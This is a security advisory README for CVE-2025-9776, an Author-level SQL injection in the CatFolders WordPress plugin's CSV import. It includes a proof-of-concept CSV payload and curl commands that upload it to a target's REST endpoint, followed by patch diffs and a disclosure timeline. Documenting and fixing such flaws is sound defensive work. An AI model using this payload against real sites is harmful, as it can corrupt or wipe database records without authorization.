CVE-2025-9776: Authenticated SQL Injection in CatFolders WordPress Plugin

Keywords: CVE-2025-9776, CatFolders WordPress vulnerability, SQL injection WordPress, authenticated SQL injection, WordPress security, CSV import vulnerability, WordPress plugin exploit, CWE-89, WordPress database attack, media library vulnerability, WordPress CVE 2025

Table of Contents

• Overview
• Vulnerability Details
• Technical Analysis
• Proof of Concept
• Remediation Guide
• CVSS Metrics
• References
• Security Contact

Overview

An authenticated SQL Injection vulnerability was discovered in the CatFolders WordPress plugin that allows Author-level users to manipulate database queries through malicious CSV imports.

Discovered by: Kai Aizen (SnailSploit)
Published: 2025
CVSS Score: 6.5 (Medium)
CWE: CWE-89 - SQL Injection

Vulnerability Details

Description

CatFolders – Tame Your WordPress Media Library by Category contains an authenticated SQL Injection vulnerability in the CSV import functionality. The attachments column from a user-supplied CSV is split into a list and passed directly to FolderModel::set_attachments() which concatenates those values into raw SQL IN (...) clauses without proper sanitization or parameterization.

Impact

This vulnerability allows authenticated attackers with Author-level privileges to:

• Execute arbitrary SQL queries
• Mass deletion or manipulation of folder-attachment mappings
• Potential data exposure depending on payload and database structure
• Compromise database integrity and availability

Affected Versions

• Vulnerable: All versions ≤ 2.5.2
• Patched: Version 2.5.3 and above (verify with vendor)

CVSS v3.1 Metrics

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Metric	Value
Attack Vector	Network (AV:N)
Attack Complexity	Low (AC:L)
Privileges Required	Low (PR:L) - Author+
User Interaction	None (UI:N)
Scope	Unchanged (S:U)
Confidentiality	None (C:N)
Integrity	Low (I:L)
Availability	Low (A:L)

Technical Details

Vulnerable Code Path

The vulnerability exists in the CSV import workflow:

File: includes/Rest/Controllers/ImportController.php

1. The import_csv method parses uploaded CSV without per-field sanitization
2. restore_folders() calls:

FolderModel::set_attachments( 
    $new_folder['id'], 
    explode(',', $folder['attachments']), 
    false 
);

File: includes/Models/FolderModel.php

3. set_attachments() builds raw SQL using string concatenation:

'raw' => 'post_id IN (' . $attachmentIds . ')'

4. Each element is not cast to integer nor parameterized, allowing SQL injection

Attack Vector

An attacker with Author-level privileges (upload_files capability) can inject malicious SQL through the CSV import endpoint:

Malicious CSV payload:

id,name,attachments
1,Test Folder,"1) OR 1=1--"

Resulting vulnerable query:

SELECT folder_id FROM wp_catf_folder_posts 
WHERE post_id IN (1) OR 1=1--)

This breaks out of the IN(...) clause and alters query semantics, potentially affecting all rows.

Prerequisites

• Author-level account (or higher) on target WordPress site
• CatFolders plugin installed and active
• Access to the REST API import endpoint

Proof of Concept

Step 1: Discover the REST Namespace

curl -s https://target.site/wp-json | jq -r '.routes | keys[]' | grep '/import-csv$'

Typical result: /catf/v1/import-csv

Step 2: Prepare Malicious CSV

Create a file named catf_inject.csv:

id,name,attachments
1,Malicious Folder,"1) OR 1=1--"

Step 3: Execute the Attack

NS="/catf/v1"  # Replace with discovered namespace

curl -i \
  -u 'author_user:APPLICATION_PASSWORD' \
  -F "file=@catf_inject.csv;type=text/csv" \
  -X POST "https://target.site/wp-json${NS}/import-csv"

Expected response:

{ "success": true }

Impact Demonstration

The server constructs and executes:

SELECT folder_id FROM wp_catf_folder_posts WHERE post_id IN (1) OR 1=1--)

This may perform broader DELETE/INSERT operations than intended, often wiping folder-attachment relationships across the entire database.

Safe Testing Environment

Run the standalone SQLite simulation to observe the vulnerability safely:

python3 poc/catfolders_sql_poc.py

This prints the vulnerable query and demonstrates how a malicious token returns all rows, while a parameterized version properly rejects it.

Remediation

For Site Administrators

Immediate Action Required:

1. Update CatFolders to version 2.5.3 or later
2. Review user accounts with Author-level or higher privileges
3. Audit database logs for suspicious queries between affected dates
4. Check folder-attachment mappings for unexpected modifications

For Developers

Two minimal hardening steps:

1. Sanitize IDs Before Calling the Model

- FolderModel::set_attachments( $new_folder['id'], explode(',', $folder['attachments']), false );
+ $ids = array_filter( array_map( 'intval', explode(',', $folder['attachments']) ) );
+ if ( ! empty( $ids ) ) {
+     FolderModel::set_attachments( (int) $new_folder['id'], $ids, false );
+ }

2. Enforce Integers Inside set_attachments()

  $imgIds = apply_filters( 'catf_attachment_ids_to_folder', $imgIds );
+ $imgIds = array_values( array_filter( array_map( 'intval', (array) $imgIds ) ) );

Stronger Recommendation

Replace all raw SQL concatenation with parameterized queries using WordPress's $wpdb->prepare():

$placeholders = implode(',', array_fill(0, count($imgIds), '%d'));
$query = $wpdb->prepare(
    "SELECT folder_id FROM {$wpdb->prefix}catf_folder_posts WHERE post_id IN ($placeholders)",
    ...$imgIds
);

Additionally:

• Validate all CSV fields strictly before processing
• Implement input type validation at the API layer
• Add rate limiting to the import endpoint
• Log all import operations for audit trails

Patch File

A complete patch is available in patch/catfolders_fix.patch

Repository Structure

CVE-2025-9776/
├── README.md                    # This file
├── poc/
│   ├── catf_inject.csv         # Malicious CSV payload
│   └── catfolders_sql_poc.py   # Safe SQLite simulation
└── patch/
    └── catfolders_fix.patch    # Recommended fixes

Timeline

• Discovery Date: 2025
• Vendor Notification: Coordinated disclosure via Wordfence
• Public Disclosure: 2025
• Patch Available: Version 2.5.3

References

• MITRE CVE Entry
• Wordfence Intelligence Advisory
• WordPress Plugin Directory
• SnailSploit Research

Credits

Researcher: Kai Aizen (SnailSploit)

Disclosure Process: Coordinated through Wordfence Bug Bounty Program

Ethical Considerations

⚠️ IMPORTANT DISCLAIMER

This Proof of Concept is provided exclusively for defensive research and educational purposes.

Usage Guidelines

• ✅ DO: Test on your own systems or with explicit written authorization
• ✅ DO: Use for security training and awareness
• ✅ DO: Implement the fixes in your own code
• ❌ DO NOT: Test against systems without permission
• ❌ DO NOT: Use for malicious purposes
• ❌ DO NOT: Exploit in production environments

Legal Notice

Unauthorized access to computer systems is illegal under laws including:

• Computer Fraud and Abuse Act (CFAA) - United States
• Computer Misuse Act - United Kingdom
• Similar legislation in other jurisdictions

Use at your own risk. The researchers and SnailSploit assume no liability for misuse of this information.

Contact

For questions or additional information about this vulnerability:

• Email: kai@owasp.com
• LinkedIn: linkedin.com/in/kaiaizen
• Website: snailsploit.com
• Organization: SnailSploit Security Research

---

Stay secure and keep your WordPress installations updated!

Last updated: October 13, 2025